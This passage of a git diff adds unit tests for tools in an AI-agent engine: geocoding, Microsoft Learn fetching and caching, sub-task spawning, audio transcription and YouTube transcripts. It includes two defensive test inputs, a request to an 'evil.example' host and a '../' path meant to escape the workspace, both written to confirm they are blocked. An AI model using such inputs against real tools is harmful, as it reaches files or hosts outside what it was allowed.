expect(url).toContain('accept-language=ja'); + }); + + it('accepts numeric strings for lat/lon', async () => { + workspacePath = makeWorkspace(); + const fetchMock = vi.fn().mockResolvedValue(jsonResponse({ + place_id: 1, + lat: '35.0', + lon: '139.0', + display_name: 'どこか', + address: {}, + boundingbox: [], + })); + vi.stubGlobal('fetch', fetchMock); + + const result = await executeTool( + 'ReverseGeocode', + { lat: '35.0', lon: '139.0' }, + makeContext(workspacePath), + ); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('**住所(全体)**: どこか'); + }); + + it('returns error on Nominatim HTTP failure', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse({}, 404))); + + const result = await executeTool('ReverseGeocode', { lat: 35, lon: 139 }, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('Nominatim API エラー: HTTP 404'); + }); + + it('returns non-error message when address is not found', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockResolvedValue(jsonResponse({ error: 'Unable to geocode' }))); + + const result = await executeTool('ReverseGeocode', { lat: 0, lon: 0 }, makeContext(workspacePath)); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('座標 (0, 0) の住所が見つかりませんでした'); + }); + + it('returns error when fetch throws', async () => { + workspacePath = makeWorkspace(); + vi.stubGlobal('fetch', vi.fn().mockRejectedValue(new Error('boom'))); + + const result = await executeTool('ReverseGeocode', { lat: 35, lon: 139 }, makeContext(workspacePath)); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('逆ジオコーディングエラー: boom'); + }); + }); +}); diff --git a/src/engine/tools/ms-learn.test.ts b/src/engine/tools/ms-learn.test.ts new file mode 100644 index 0000000..36b6eaa --- /dev/null +++ b/src/engine/tools/ms-learn.test.ts @@ -0,0 +1,244 @@ +import { mkdtempSync, rmSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import { afterAll, afterEach, beforeAll, describe, expect, it, vi } from 'vitest'; +import type { ToolContext, ToolResult } from './core.js'; + +// The cache DB path is resolved from process.cwd() at module load, so stub +// cwd BEFORE importing the module to keep the sqlite cache in a temp dir. +const tmpRoot = mkdtempSync(join(tmpdir(), 'ms-learn-test-')); +let executeTool: (n: string, i: Record, c: ToolContext) => Promise; +let TOOL_DEFS: Record; + +beforeAll(async () => { + vi.spyOn(process, 'cwd').mockReturnValue(tmpRoot); + const mod = await import('./ms-learn.js'); + executeTool = mod.executeTool; + TOOL_DEFS = mod.TOOL_DEFS; +}); + +afterAll(() => { + rmSync(tmpRoot, { recursive: true, force: true }); +}); + +afterEach(() => { + vi.unstubAllGlobals(); +}); + +const ctx = {} as ToolContext; + +function htmlResponse(body: string, status = 200): Response { + return new Response(body, { status, headers: { 'content-type': 'text/html' } }); +} + +function jsonResponse(body: unknown, status = 200): Response { + return new Response(JSON.stringify(body), { + status, + headers: { 'content-type': 'application/json' }, + }); +} + +const LEARN_HTML = ` + +Durable Functions overview | Microsoft Learn + + +
+
+

Durable Functions overview

+

Durable Functions is an & extension of Azure Functions.

+

Patterns

+
  • Function chaining
  • Fan-out/fan-in
+
var x = 1;
+

See related docs.

+
+
+
footer chrome
+`; + +describe('TOOL_DEFS', () => { + it('registers the four Learn tools', () => { + expect(Object.keys(TOOL_DEFS).sort()).toEqual([ + 'FetchMicrosoftLearn', + 'RefreshMicrosoftLearnCache', + 'SearchMicrosoftLearn', + 'SearchMicrosoftLearnCache', + ]); + }); +}); + +describe('executeTool', () => { + it('returns null for unknown tool names', async () => { + expect(await executeTool('NotALearnTool', {}, ctx)).toBeNull(); + }); +}); + +describe('FetchMicrosoftLearn', () => { + it('requires a url', async () => { + const res = await executeTool('FetchMicrosoftLearn', {}, ctx); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('url is required'); + }); + + it('rejects URLs outside learn.microsoft.com', async () => { + const fetchMock = vi.fn(); + vi.stubGlobal('fetch', fetchMock); + const res = await executeTool('FetchMicrosoftLearn', { url: 'https://evil.example/docs' }, ctx); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('not on learn.microsoft.com'); + expect(fetchMock).not.toHaveBeenCalled(); + }); + + it('fetches a page, converts to markdown, and caches it', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse(LEARN_HTML))); + const res = await executeTool( + 'FetchMicrosoftLearn', + { url: 'https://learn.microsoft.com/en-us/azure/durable?view=latest#anchor' }, + ctx, + ); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('Fetched and cached'); + // Title cleaned of the "| Microsoft Learn" suffix. + expect(res?.output).toContain('# Durable Functions overview'); + // Entity decoding, headings, lists, fenced code, links survive. + expect(res?.output).toContain('an & extension'); + expect(res?.output).toContain('## Patterns'); + expect(res?.output).toContain('- Function chaining'); + expect(res?.output).toContain('```csharp\nvar x = 1;\n```'); + expect(res?.output).toContain('[related docs](https://learn.microsoft.com/en-us/azure/other)'); + // Chrome outside
is dropped. + expect(res?.output).not.toContain('site nav chrome'); + expect(res?.output).not.toContain('footer chrome'); + }); + + it('serves the cached copy (query/hash canonicalized away) without refetching', async () => { + const fetchMock = vi.fn(); + vi.stubGlobal('fetch', fetchMock); + const res = await executeTool( + 'FetchMicrosoftLearn', + { url: 'https://learn.microsoft.com/en-us/azure/durable?other=param' }, + ctx, + ); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('Cached (age='); + expect(res?.output).toContain('Durable Functions overview'); + expect(fetchMock).not.toHaveBeenCalled(); + }); + + it('reports HTTP errors as tool errors', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse('nope', 404))); + const res = await executeTool( + 'FetchMicrosoftLearn', + { url: 'https://learn.microsoft.com/en-us/azure/missing' }, + ctx, + ); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('HTTP 404'); + }); +}); + +describe('SearchMicrosoftLearnCache', () => { + it('requires a query', async () => { + const res = await executeTool('SearchMicrosoftLearnCache', {}, ctx); + expect(res?.isError).toBe(true); + }); + + it('finds previously cached pages via FTS', async () => { + const res = await executeTool('SearchMicrosoftLearnCache', { query: 'durable functions' }, ctx); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('Cache hits'); + expect(res?.output).toContain('https://learn.microsoft.com/en-us/azure/durable'); + }); + + it('reports zero hits without error', async () => { + const res = await executeTool('SearchMicrosoftLearnCache', { query: 'zzz-no-such-term' }, ctx); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('No cache hits'); + }); +}); + +describe('RefreshMicrosoftLearnCache', () => { + it('force-refetches and overwrites the cache', async () => { + const updated = LEARN_HTML.replace('an & extension', 'a refreshed extension'); + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse(updated))); + const res = await executeTool( + 'RefreshMicrosoftLearnCache', + { url: 'https://learn.microsoft.com/en-us/azure/durable' }, + ctx, + ); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('Refreshed'); + + const cached = await executeTool( + 'FetchMicrosoftLearn', + { url: 'https://learn.microsoft.com/en-us/azure/durable' }, + ctx, + ); + expect(cached?.output).toContain('a refreshed extension'); + }); + + it('surfaces refresh failures', async () => { + vi.stubGlobal('fetch', vi.fn().mockRejectedValue(new Error('socket hang up'))); + const res = await executeTool( + 'RefreshMicrosoftLearnCache', + { url: 'https://learn.microsoft.com/en-us/azure/durable' }, + ctx, + ); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('socket hang up'); + }); +}); + +describe('SearchMicrosoftLearn', () => { + it('requires a query', async () => { + const res = await executeTool('SearchMicrosoftLearn', {}, ctx); + expect(res?.isError).toBe(true); + }); + + it('merges online results with cache hits and clamps top to 25', async () => { + const fetchMock = vi.fn().mockImplementation(async () => + jsonResponse({ + results: [ + { title: 'Durable Functions overview', url: 'https://learn.microsoft.com/en-us/azure/durable', description: 'desc' }, + { title: 'broken', description: 'no url, filtered out' }, + ], + }), + ); + vi.stubGlobal('fetch', fetchMock); + const res = await executeTool( + 'SearchMicrosoftLearn', + { query: 'durable functions', top: 100, products: ['azure'] }, + ctx, + ); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('## Online results (1)'); + // The cached page is flagged. + expect(res?.output).toContain('[cached]'); + expect(res?.output).toContain('## Cache hits'); + const calledUrl = String(fetchMock.mock.calls[0]?.[0]); + expect(calledUrl).toContain('%24top=25'); + expect(calledUrl).toContain('products=azure'); + }); + + it('falls back to cache-only results when the online API fails', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => jsonResponse({}, 503))); + const res = await executeTool('SearchMicrosoftLearn', { query: 'durable functions' }, ctx); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('## Cache hits'); + expect(res?.output).toContain('online search failed'); + }); + + it('errors when online fails and the cache has nothing', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => jsonResponse({}, 503))); + const res = await executeTool('SearchMicrosoftLearn', { query: 'zzz-no-such-term' }, ctx); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('Search failed'); + }); + + it('reports no results without error when both sources are empty', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => jsonResponse({ results: [] }))); + const res = await executeTool('SearchMicrosoftLearn', { query: 'zzz-no-such-term' }, ctx); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('No results'); + }); +}); diff --git a/src/engine/tools/orchestration.test.ts b/src/engine/tools/orchestration.test.ts new file mode 100644 index 0000000..b23e557 --- /dev/null +++ b/src/engine/tools/orchestration.test.ts @@ -0,0 +1,118 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { mkdtempSync, rmSync, writeFileSync, mkdirSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import type { ToolContext } from './core.js'; +import { TOOL_DEFS, executeTool } from './orchestration.js'; + +let tmp: string; + +beforeEach(() => { + tmp = mkdtempSync(join(tmpdir(), 'orchestration-test-')); +}); + +afterEach(() => { + rmSync(tmp, { recursive: true, force: true }); +}); + +const makeCtx = (overrides: Partial = {}): ToolContext => + ({ + workspacePath: tmp, + spawnSubTask: vi.fn().mockResolvedValue({ + subtaskIndex: 1, + jobId: 42, + workspacePath: join(tmp, 'subtasks', '1'), + }), + ...overrides, + }) as unknown as ToolContext; + +describe('TOOL_DEFS', () => { + it('registers SpawnSubTask with title and instruction required', () => { + const def = TOOL_DEFS['SpawnSubTask']; + expect(def?.function.name).toBe('SpawnSubTask'); + expect(def?.function.parameters?.['required']).toEqual(['title', 'instruction']); + }); +}); + +describe('executeTool', () => { + it('returns null for unknown tool names', async () => { + expect(await executeTool('NotATool', {}, makeCtx())).toBeNull(); + }); + + it('errors when spawnSubTask is unavailable in this context', async () => { + const res = await executeTool( + 'SpawnSubTask', + { title: 't', instruction: 'i' }, + makeCtx({ spawnSubTask: undefined }), + ); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('使用できません'); + }); + + it.each([ + [{ instruction: 'i' }], + [{ title: 't' }], + [{ title: ' ', instruction: 'i' }], + [{ title: 't', instruction: '' }], + [{ title: 42, instruction: 'i' }], + ])('rejects missing/blank title or instruction: %j', async input => { + const res = await executeTool('SpawnSubTask', input as Record, makeCtx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('必須'); + }); + + it('spawns with the default piece and reports job details', async () => { + const ctx = makeCtx(); + const res = await executeTool('SpawnSubTask', { title: ' t ', instruction: ' do it ' }, ctx); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('サブタスク #1'); + expect(res?.output).toContain('ジョブ ID: 42'); + expect(ctx.spawnSubTask).toHaveBeenCalledWith({ title: 't', instruction: 'do it', piece: 'general' }); + }); + + it('rejects a piece that exists neither builtin nor custom', async () => { + const ctx = makeCtx(); + const res = await executeTool( + 'SpawnSubTask', + { title: 't', instruction: 'i', piece: 'no-such-piece' }, + ctx, + ); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('no-such-piece'); + expect(ctx.spawnSubTask).not.toHaveBeenCalled(); + }); + + it('accepts a piece found in a custom pieces dir', async () => { + const customDir = join(tmp, 'custom-pieces'); + mkdirSync(customDir, { recursive: true }); + writeFileSync(join(customDir, 'my-piece.yaml'), 'name: my-piece\n'); + const ctx = makeCtx({ customPiecesDir: customDir } as Partial); + const res = await executeTool( + 'SpawnSubTask', + { title: 't', instruction: 'i', piece: 'my-piece' }, + ctx, + ); + expect(res?.isError).toBe(false); + expect(ctx.spawnSubTask).toHaveBeenCalledWith({ title: 't', instruction: 'i', piece: 'my-piece' }); + }); + + it('accepts custom pieces dirs given as an array', async () => { + const customDir = join(tmp, 'pieces-a'); + mkdirSync(customDir, { recursive: true }); + writeFileSync(join(customDir, 'arr-piece.yaml'), 'name: arr-piece\n'); + const ctx = makeCtx({ customPiecesDir: [join(tmp, 'empty'), customDir] } as Partial); + const res = await executeTool( + 'SpawnSubTask', + { title: 't', instruction: 'i', piece: 'arr-piece' }, + ctx, + ); + expect(res?.isError).toBe(false); + }); + + it('surfaces spawn failures as tool errors', async () => { + const ctx = makeCtx({ spawnSubTask: vi.fn().mockRejectedValue(new Error('queue full')) }); + const res = await executeTool('SpawnSubTask', { title: 't', instruction: 'i' }, ctx); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('queue full'); + }); +}); diff --git a/src/engine/tools/speech.test.ts b/src/engine/tools/speech.test.ts new file mode 100644 index 0000000..5eedbdc --- /dev/null +++ b/src/engine/tools/speech.test.ts @@ -0,0 +1,157 @@ +import { mkdtempSync, rmSync, writeFileSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'; +import type { ToolContext } from './core.js'; +import { executeTool, TOOL_DEFS } from './speech.js'; + +let ws: string; + +beforeEach(() => { + ws = mkdtempSync(join(tmpdir(), 'speech-test-')); + writeFileSync(join(ws, 'meeting.mp3'), Buffer.from('fake-mp3-bytes')); +}); + +afterEach(() => { + rmSync(ws, { recursive: true, force: true }); + vi.unstubAllGlobals(); +}); + +const ctx = (toolsConfig: Record | undefined = { speechServerUrl: 'http://stt.local/v1/' }): ToolContext => + ({ workspacePath: ws, toolsConfig }) as unknown as ToolContext; + +function jsonResponse(body: unknown, status = 200): Response { + return new Response(JSON.stringify(body), { + status, + headers: { 'content-type': 'application/json' }, + }); +} + +describe('TranscribeAudio', () => { + it('returns null for unknown tool names', async () => { + expect(await executeTool('NotSpeech', {}, ctx())).toBeNull(); + }); + + it('registers TranscribeAudio with file_path required', () => { + expect(TOOL_DEFS['TranscribeAudio']?.function.parameters?.['required']).toEqual(['file_path']); + }); + + it('requires file_path', async () => { + const res = await executeTool('TranscribeAudio', {}, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('file_path は必須'); + }); + + it('errors when speech_server_url is not configured', async () => { + const res = await executeTool('TranscribeAudio', { file_path: 'meeting.mp3' }, ctx({})); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('speech_server_url'); + }); + + it('rejects unsupported extensions', async () => { + writeFileSync(join(ws, 'video.mp4'), 'x'); + const res = await executeTool('TranscribeAudio', { file_path: 'video.mp4' }, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('対応フォーマット'); + }); + + it('errors for a missing file', async () => { + const res = await executeTool('TranscribeAudio', { file_path: 'ghost.wav' }, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('ファイルが見つかりません'); + }); + + it('blocks paths escaping the workspace', async () => { + await expect( + executeTool('TranscribeAudio', { file_path: '../outside.mp3' }, ctx()), + ).rejects.toThrow(); + }); + + it('posts the file and formats diarized segments grouped by speaker', async () => { + const fetchMock = vi.fn().mockImplementation(async () => + jsonResponse({ + segments: [ + { speaker: 'A', text: 'こんにちは。' }, + { speaker: 'A', text: '今日の議題です。' }, + { speaker: 'B', text: 'はい。' }, + ], + }), + ); + vi.stubGlobal('fetch', fetchMock); + + const res = await executeTool('TranscribeAudio', { file_path: 'meeting.mp3', prompt: '議題' }, ctx()); + + expect(res?.isError).toBe(false); + expect(res?.output).toContain('## 文字起こし結果: meeting.mp3'); + expect(res?.output).toContain('[A] こんにちは。今日の議題です。'); + expect(res?.output).toContain('[B] はい。'); + + // URL is normalized (no double slash) and diarization header is sent. + expect(String(fetchMock.mock.calls[0]?.[0])).toBe('http://stt.local/v1/audio/transcriptions'); + const init = fetchMock.mock.calls[0]?.[1] as RequestInit; + expect((init.headers as Record)['X-Diarize']).toBe('true'); + const form = init.body as FormData; + expect(form.get('language')).toBe('ja'); + expect(form.get('prompt')).toBe('議題'); + expect(form.get('response_format')).toBe('verbose_json'); + }); + + it('joins segments without speaker labels when diarize=false', async () => { + const fetchMock = vi.fn().mockImplementation(async () => + jsonResponse({ segments: [{ text: 'ひとつ。' }, { text: 'ふたつ。' }] }), + ); + vi.stubGlobal('fetch', fetchMock); + + const res = await executeTool( + 'TranscribeAudio', + { file_path: 'meeting.mp3', diarize: false }, + ctx(), + ); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('ひとつ。ふたつ。'); + expect(res?.output).not.toContain('[Unknown]'); + const init = fetchMock.mock.calls[0]?.[1] as RequestInit; + expect((init.headers as Record)['X-Diarize']).toBeUndefined(); + }); + + it('falls back to plain text when no segments are returned', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => jsonResponse({ text: '全文テキスト' }))); + const res = await executeTool('TranscribeAudio', { file_path: 'meeting.mp3' }, ctx()); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('全文テキスト'); + }); + + it('uses the configured speech language as default', async () => { + const fetchMock = vi.fn().mockImplementation(async () => jsonResponse({ text: 'hi' })); + vi.stubGlobal('fetch', fetchMock); + await executeTool( + 'TranscribeAudio', + { file_path: 'meeting.mp3' }, + ctx({ speechServerUrl: 'http://stt.local', speechLanguage: 'en' }), + ); + const form = (fetchMock.mock.calls[0]?.[1] as RequestInit).body as FormData; + expect(form.get('language')).toBe('en'); + }); + + it('reports server errors with status code', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => new Response('boom', { status: 500 }))); + const res = await executeTool('TranscribeAudio', { file_path: 'meeting.mp3' }, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('音声認識サーバーエラー (500)'); + }); + + it('reports an empty transcription as an error', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => jsonResponse({}))); + const res = await executeTool('TranscribeAudio', { file_path: 'meeting.mp3' }, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('文字起こし結果が空です'); + }); + + it('reports connection failures with the server URL', async () => { + vi.stubGlobal('fetch', vi.fn().mockRejectedValue(new Error('ECONNREFUSED'))); + const res = await executeTool('TranscribeAudio', { file_path: 'meeting.mp3' }, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('音声認識サーバーに接続できません'); + expect(res?.output).toContain('ECONNREFUSED'); + }); +}); diff --git a/src/engine/tools/structured-blocks.test.ts b/src/engine/tools/structured-blocks.test.ts new file mode 100644 index 0000000..68b846a --- /dev/null +++ b/src/engine/tools/structured-blocks.test.ts @@ -0,0 +1,59 @@ +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { mkdtempSync, rmSync, readFileSync, existsSync, readdirSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import { saveStructuredBlocks, type StructuredBlock } from './structured-blocks.js'; + +let ws: string; + +beforeEach(() => { + ws = mkdtempSync(join(tmpdir(), 'structured-blocks-test-')); +}); + +afterEach(() => { + rmSync(ws, { recursive: true, force: true }); +}); + +const block = (refId: string, overrides: Partial = {}): StructuredBlock => ({ + refId, + type: 'x_posts', + title: 'sample', + data: { query: 'q', posts: [] }, + ...overrides, +}); + +describe('saveStructuredBlocks', () => { + it('writes one JSON file per block under logs/structured', () => { + saveStructuredBlocks(ws, [block('ref-1'), block('ref-2', { type: 'map_places' })]); + const dir = join(ws, 'logs', 'structured'); + expect(readdirSync(dir).sort()).toEqual(['ref-1.json', 'ref-2.json']); + const parsed = JSON.parse(readFileSync(join(dir, 'ref-1.json'), 'utf-8')) as StructuredBlock; + expect(parsed.refId).toBe('ref-1'); + expect(parsed.type).toBe('x_posts'); + expect(parsed.data).toEqual({ query: 'q', posts: [] }); + }); + + it('does nothing for an empty block list', () => { + saveStructuredBlocks(ws, []); + expect(existsSync(join(ws, 'logs', 'structured'))).toBe(false); + }); + + it('round-trips unicode data intact', () => { + saveStructuredBlocks(ws, [block('jp', { title: '日本語タイトル', data: { text: '絵文字🎉' } })]); + const parsed = JSON.parse( + readFileSync(join(ws, 'logs', 'structured', 'jp.json'), 'utf-8'), + ) as StructuredBlock; + expect(parsed.title).toBe('日本語タイトル'); + expect(parsed.data).toEqual({ text: '絵文字🎉' }); + }); + + it('swallows write failures instead of throwing', () => { + // Point the workspace at a path whose parent is a regular file. + const bogus = join(ws, 'not-a-dir'); + saveStructuredBlocks(ws, [block('pre')]); // creates logs/structured + expect(() => + saveStructuredBlocks(join(ws, 'logs', 'structured', 'pre.json'), [block('x')]), + ).not.toThrow(); + expect(existsSync(bogus)).toBe(false); + }); +}); diff --git a/src/engine/tools/youtube.test.ts b/src/engine/tools/youtube.test.ts new file mode 100644 index 0000000..2f61a80 --- /dev/null +++ b/src/engine/tools/youtube.test.ts @@ -0,0 +1,410 @@ +import { afterEach, describe, expect, it, vi } from 'vitest'; +import type { ToolContext } from './core.js'; +import { executeTool } from './youtube.js'; + +const ctx: ToolContext = { + workspacePath: '/tmp/maestro-youtube-test', + editAllowed: false, +}; + +const INNERTUBE_PLAYER_PREFIX = 'https://www.youtube.com/youtubei/v1/player'; +const INNERTUBE_SEARCH_PREFIX = 'https://www.youtube.com/youtubei/v1/search'; +const WATCH_PAGE_PREFIX = 'https://www.youtube.com/watch?v='; +const RESULTS_PAGE_PREFIX = 'https://www.youtube.com/results?search_query='; + +function jsonResponse(obj: unknown, status = 200): Response { + return new Response(JSON.stringify(obj), { + status, + headers: { 'Content-Type': 'application/json' }, + }); +} + +function stubFetch(impl: (url: string, init?: RequestInit) => Response | Promise) { + const mock = vi.fn(async (input: unknown, init?: RequestInit) => impl(String(input), init)); + vi.stubGlobal('fetch', mock); + return mock; +} + +function makePlayerResponse(overrides: Record = {}): Record { + return { + videoDetails: { title: 'Test Video', lengthSeconds: '125' }, + captions: { + playerCaptionsTracklistRenderer: { + captionTracks: [ + { languageCode: 'ja', name: { simpleText: '日本語' }, baseUrl: 'https://yt.example/timedtext?lang=ja' }, + { languageCode: 'en', name: { simpleText: 'English' }, baseUrl: 'https://yt.example/timedtext?lang=en' }, + ], + }, + }, + ...overrides, + }; +} + +const XML_FORMAT_1 = [ + '', + '

Hello & world

', + '

二行目 あ

', + '', +].join(''); + +const XML_FORMAT_2 = 'Fallback line'; + +interface SearchVideoFixture { + id: string; + title: string; + channel?: string; + views?: string; + published?: string; + length?: string; + desc?: string; +} + +function makeSearchData(videos: SearchVideoFixture[]): Record { + return { + contents: { + twoColumnSearchResultsRenderer: { + primaryContents: { + sectionListRenderer: { + contents: [ + { + itemSectionRenderer: { + contents: videos.map((v) => ({ + videoRenderer: { + videoId: v.id, + title: { runs: [{ text: v.title }] }, + ownerText: { runs: [{ text: v.channel ?? 'Chan' }] }, + ...(v.views ? { viewCountText: { simpleText: v.views } } : {}), + ...(v.published ? { publishedTimeText: { simpleText: v.published } } : {}), + ...(v.length ? { lengthText: { simpleText: v.length } } : {}), + ...(v.desc + ? { detailedMetadataSnippets: [{ snippetText: { runs: [{ text: v.desc }] } }] } + : {}), + }, + })), + }, + }, + ], + }, + }, + }, + }, + }; +} + +afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); +}); + +describe('youtube executeTool dispatch', () => { + it('returns null for unknown tool names', async () => { + const result = await executeTool('NotATool', {}, ctx); + expect(result).toBeNull(); + }); +}); + +describe('GetYouTubeTranscript', () => { + it('rejects input that contains no extractable video id', async () => { + const mock = stubFetch(() => { + throw new Error('should not fetch'); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'not a youtube link' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('YouTube 動画 ID を抽出できません'); + expect(mock).not.toHaveBeenCalled(); + }); + + it('fetches transcript via InnerTube and formats timestamped segments', async () => { + const mock = stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse(makePlayerResponse()); + if (url.startsWith('https://yt.example/timedtext')) return new Response(XML_FORMAT_1); + throw new Error(`unexpected fetch: ${url}`); + }); + + const result = await executeTool( + 'GetYouTubeTranscript', + { url: 'https://www.youtube.com/watch?v=abcdefghijk' }, + ctx, + ); + + expect(result?.isError).toBe(false); + expect(result?.output).toContain('# Test Video'); + expect(result?.output).toContain('URL: https://www.youtube.com/watch?v=abcdefghijk'); + expect(result?.output).toContain('動画時間: 2:05'); + expect(result?.output).toContain('言語: ja'); + expect(result?.output).toContain('利用可能な言語: ja(日本語), en(English)'); + expect(result?.output).toContain('字幕セグメント数: 2'); + // entity decoding + tag concatenation + timestamp formatting + expect(result?.output).toContain('[0:00] Hello & world'); + expect(result?.output).toContain('[1:01] 二行目 あ'); + + // InnerTube call carries the extracted video id + const body = JSON.parse(String((mock.mock.calls[0][1] as RequestInit).body)) as Record; + expect(body.videoId).toBe('abcdefghijk'); + }); + + it('accepts a bare 11-character video id', async () => { + const mock = stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse(makePlayerResponse()); + return new Response(XML_FORMAT_1); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'dQw4w9WgXcQ' }, ctx); + expect(result?.isError).toBe(false); + const body = JSON.parse(String((mock.mock.calls[0][1] as RequestInit).body)) as Record; + expect(body.videoId).toBe('dQw4w9WgXcQ'); + }); + + it('accepts youtu.be short URLs', async () => { + const mock = stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse(makePlayerResponse()); + return new Response(XML_FORMAT_1); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'https://youtu.be/abc_def-123' }, ctx); + expect(result?.isError).toBe(false); + const body = JSON.parse(String((mock.mock.calls[0][1] as RequestInit).body)) as Record; + expect(body.videoId).toBe('abc_def-123'); + }); + + it('selects the requested language track when available', async () => { + const mock = stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse(makePlayerResponse()); + if (url === 'https://yt.example/timedtext?lang=en') return new Response(XML_FORMAT_1); + throw new Error(`unexpected fetch: ${url}`); + }); + const result = await executeTool( + 'GetYouTubeTranscript', + { url: 'abcdefghijk', lang: 'en' }, + ctx, + ); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('言語: en'); + expect(mock).toHaveBeenCalledWith('https://yt.example/timedtext?lang=en', expect.anything()); + }); + + it('errors with the available language list when the requested language is missing', async () => { + stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse(makePlayerResponse()); + throw new Error(`unexpected fetch: ${url}`); + }); + const result = await executeTool( + 'GetYouTubeTranscript', + { url: 'abcdefghijk', lang: 'fr' }, + ctx, + ); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('言語 "fr" の字幕は利用できません'); + expect(result?.output).toContain('ja(日本語)'); + expect(result?.output).toContain('en(English)'); + }); + + it('returns an error when the InnerTube API responds non-OK', async () => { + stubFetch(() => new Response('', { status: 403, statusText: 'Forbidden' })); + const result = await executeTool('GetYouTubeTranscript', { url: 'abcdefghijk' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('字幕の取得に失敗しました'); + expect(result?.output).toContain('403'); + }); + + it('returns an error when the transcript XML cannot be parsed', async () => { + stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse(makePlayerResponse()); + return new Response(''); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'abcdefghijk' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('この動画の字幕を解析できませんでした'); + }); + + it('falls back to the watch page when InnerTube returns no caption tracks', async () => { + const pagePlayerResponse = { + captions: { + playerCaptionsTracklistRenderer: { + captionTracks: [ + { languageCode: 'en', baseUrl: 'https://yt.example/fallback-track' }, + ], + }, + }, + }; + const html = ``; + stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) { + return jsonResponse({ videoDetails: { title: 'Test Video', lengthSeconds: '125' } }); + } + if (url.startsWith(WATCH_PAGE_PREFIX)) return new Response(html); + if (url === 'https://yt.example/fallback-track') return new Response(XML_FORMAT_2); + throw new Error(`unexpected fetch: ${url}`); + }); + + const result = await executeTool('GetYouTubeTranscript', { url: 'abcdefghijk' }, ctx); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('# Test Video'); + expect(result?.output).toContain('言語: en'); + expect(result?.output).toContain('字幕セグメント数: 1'); + // format-2 XML: start="1.5" → 0:01 + expect(result?.output).toContain('[0:01] Fallback line'); + }); + + it('reports missing captions when the watch page has no ytInitialPlayerResponse', async () => { + stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse({ videoDetails: { title: 'T' } }); + if (url.startsWith(WATCH_PAGE_PREFIX)) return new Response('no data'); + throw new Error(`unexpected fetch: ${url}`); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'abcdefghijk' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('字幕情報が見つかりませんでした'); + }); + + it('reports CAPTCHA when YouTube serves a recaptcha page', async () => { + stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse({}); + if (url.startsWith(WATCH_PAGE_PREFIX)) return new Response('
